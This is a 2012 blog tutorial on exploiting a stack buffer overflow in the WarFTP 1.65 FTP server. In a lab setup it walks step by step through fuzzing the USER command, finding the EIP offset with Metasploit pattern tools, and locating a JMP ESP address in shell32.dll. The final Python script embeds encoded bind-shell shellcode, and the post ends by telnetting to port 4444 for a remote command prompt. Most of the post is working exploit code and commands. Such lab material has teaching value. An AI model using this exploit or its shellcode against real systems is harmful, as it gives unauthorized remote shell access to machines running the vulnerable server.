Comments

Pages

Tuesday, 18 September 2012

Buffer Overflow WarFTP 1.65

Posted by at 00:47 Read our previous post
At this time I will post about Buffer Overflow, and the target is WarFTP 1.65.
The tools needed is :

  • Olly Debugger 1.10
  • WarFTP 1.65
  • Windows XP Service Pack 2 or 3
  • BackTrack
First, we need to install ollydbg and warftp in windows. After it, we must creating fuzzer for WarFTP. The fuzzer code is look like this :

#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "\x41" * 1000
s.connect(('192.168.43.129',2222))
data = s.recv(1024)
print ("Sending data to WarFTP...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send(' PASS PASSWORD '+'\r\n')
s.close()
print ("Finish")

Save as into fuzzer.py
Please change the configuration of IP address and Port, default port for WarFTP port is 21. But I'm using 2222 because my 21 port are busy.
Now run this fuzzer from BackTrack, but we need to give access on it by run this command:
chmod +x fuzzer.py

./fuzzer.py
Back into Windows, and look what happen with WarFTP? Crash? If yes, the fuzzer is work.
Now I will check it from Ollydbg, Close your WarFTP and reopen, then open Ollydb->File->attach->select WarFTP and click play. See in the right panel, what happen with EIP? overwriten right? If yes, it means that the application is exploitable using buffer overflow method.

We need to know where is the byte of register are overwriten. The simple way is using Metasploit with pattern_create. Now open your metasploit:
cd /pentest/exploits/framework/tools
create pattern with amount 1000 and save into pattern.txt
./pattern_create.rb 1000 > pattern.txt
Open your pattern.txt and copy the code into fuzzer, and edit the fuzzer look like this

#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
s.connect(('192.168.43.129',2222))
data = s.recv(1024)
print ("Sending data to WarFTP...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send(' PASS PASSWORD '+'\r\n')
s.close()
print ("Finish")
Back into Windows, restart your WarFTP and reopen using Ollydbg then run the fuzzer from backtrack. After it, back into windows and see at ollydbg. The ESP has been overwritten by the fuzzer and the value is "q4Aq5Aq......"

Now time for finding the byte that has been overwritten th string using pattern_offset, tools from Metasploit.
cd /pentest/exploits/framework/tools
Give the EIP from Ollydbg, 32714131
./pattern_offset.rb 32714131
It will return 485
Give the string of EIP from Ollydbg
./pattern_offset.rb q4Aq5Aq
It will return 493
Next I will overwrite the EIP into DEADBEEF. And the little endian of DEADBEEF is \xEF\xBE\xAD\xDE.
why need DEADBEEF, because the alpa string of ascii is A into F.
Edit your fuzzer
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
nilaiEIP = "\x41" * 485
nilaiEIP += "\xEF\xBE\xAD\xDE"
s.connect(('192.168.43.129',2222))
data = s.recv(1024)
print ("Sending data to WarFTP...")
s.send('USER '+nilaiEIP+'\r\n')
data = s.recv(1024)
s.send(' PASS PASSWORD '+'\r\n')
s.close()
print ("Finish")
Reopen your warFTP and debug with Ollydbg. And run the fuzzer.
Look into Olly and see EIP has been overwritten with DEADBEEF
Now, I will write data into stack with CC. Edit your fuzzer
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "\x90" * 485
buffer += "\xEF\xBE\xAD\xDE"
buffer += "\x90" * (493-len(buffer))
buffer += "\xCC" * (1000-len(buffer))
s.connect(('192.168.43.129',2222))
data = s.recv(1024)
print ("Sending data to WarFTP...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send(' PASS PASSWORD '+'\r\n')
s.close()
print ("Finish")
Next we need to know about the library are used by the warFTP and where is the register for JMP ESP.
Why we need to do this? because we will to write the backdoor/payload here.
Reopen your warFTP and debug with Ollydbg, open View->Executable Modules and double click shell32.dll. Next search the JMP ESP, Right Click in the shell32.dll CPU, select Search For->Command and fill with "jmp esp" without quote and click search. Please remember the Register, in my case the register is 7CB3DDEE. May be can different in your machine.

Now open your console, and run this command
cd /pentest/exploits/framework2/
./msfweb
open your browser and locate the url http://127.0.0.1:55555
select payloads, select OS:win32 as filter and search for Bind Shell
Set the config look like the images above, and then click Generate Payload.
Copy the payload code and edit the fuzzer.

#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "\x90" * 485
#buffer += "\xED\x1E\x94\x7C"
buffer += "\xEE\xDD\xB3\x7C"
buffer += "\x90" * 32
buffer += ("\x29\xc9\xb1\x51\xd9\xeb\xd9\x74\x24\xf4\x5a\xbb\x66\xa8\xc8\x21"
"\x31\x5a\x13\x83\xea\xfc\x03\x3c\xa7\x2a\xd4\x3c\xdd\x41\x5a\x54"
"\xdb\x69\x9a\x5b\x7c\x1d\x09\x87\x59\xaa\x97\xfb\x2a\xd0\x12\x7b"
"\x2c\xc6\x96\x34\x36\x93\xf6\xea\x47\x48\x41\x61\x73\x05\x53\x9b"
"\x4d\xd9\xcd\xcf\x2a\x19\x99\x08\xf2\x50\x6f\x17\x36\x8f\x84\x2c"
"\xe2\x74\x4d\x27\xef\xfe\xd2\xe3\xee\xeb\x8b\x60\xfc\xa0\xd8\x29"
"\xe1\x37\x34\xd6\x35\xb3\x43\xb4\x61\xdf\x32\x87\x5b\x04\xd0\x8c"
"\xdf\x8a\x92\xd2\xd3\x61\xd4\xce\x46\xfe\x55\xe6\xc6\x69\xd8\xb8"
"\xf8\x85\xb4\xbb\xd3\x30\x66\x25\xb4\x8f\xba\xc1\x33\x83\x88\x4e"
"\xe8\x9c\x3d\x18\xdb\x8e\x42\xe3\x8b\xaf\x6d\x4c\xa5\xb5\xf4\xf3"
"\x58\x3d\xfb\xa6\xc8\x3c\x04\x98\x65\x98\xf3\xed\xdb\x4d\xfb\xdb"
"\x77\x21\x50\xb0\x24\x86\x05\x75\x98\xf7\x7a\x1f\x76\x19\x27\xb9"
"\xd5\x90\x36\xd0\xb2\x06\xa2\xaa\x85\x10\x2c\x9c\x60\x8f\x83\x75"
"\x8a\x7f\x4b\xd1\xd9\xae\x65\x4e\xdd\x79\x26\x25\xde\x56\xa1\x20"
"\x69\xd1\x7b\xfd\x95\x0b\x2b\x55\x3e\xe1\x33\x85\x2d\x61\x2b\x5c"
"\x94\x0b\xe4\x61\xce\xb9\xf5\x4d\x89\x2b\x6e\x0b\x3e\xcf\x03\x5a"
"\x5b\x65\x8c\x05\x8d\xb6\xa5\x52\xa7\x02\x3f\x7e\x09\x4b\xcc\xd4"
"\x94\x09\x1e\xd6\x2b\xa2\xf3\xab\xd6\x82\x58\x18\x8d\x9b\xec\xa0"
"\x61\x4d\xee\x29\xc2\x8d\xc6\x8a\x9d\x23\xb6\x7d\x73\xae\x39\x2c"
"\x22\x7b\x6b\x31\x14\xeb\x26\x14\x90\x22\x6b\x59\x4d\xd0\x73\x5a"
"\x45\xda\x5c\x2f\xfd\xd8\xde\xeb\x66\xde\x37\xa1\x99\xf0\xd0\x3b"
"\xbe\x13\x53\x90\xc1\x02\x6b\xc6")
s.connect(('192.168.43.129',2222))
data = s.recv(1024)
print ("Sending data to WarFTP...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send(' PASS PASSWORD '+'\r\n')
s.close()
print ("Finish")
Reopen your WarFTP without load in Ollydbg, and run the fuzzer.
Finally connect into target using telnet or netcut with 4444 port.
telnet 192.168.43.129 4444
If success, you will bring into windows CMD prompt

No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template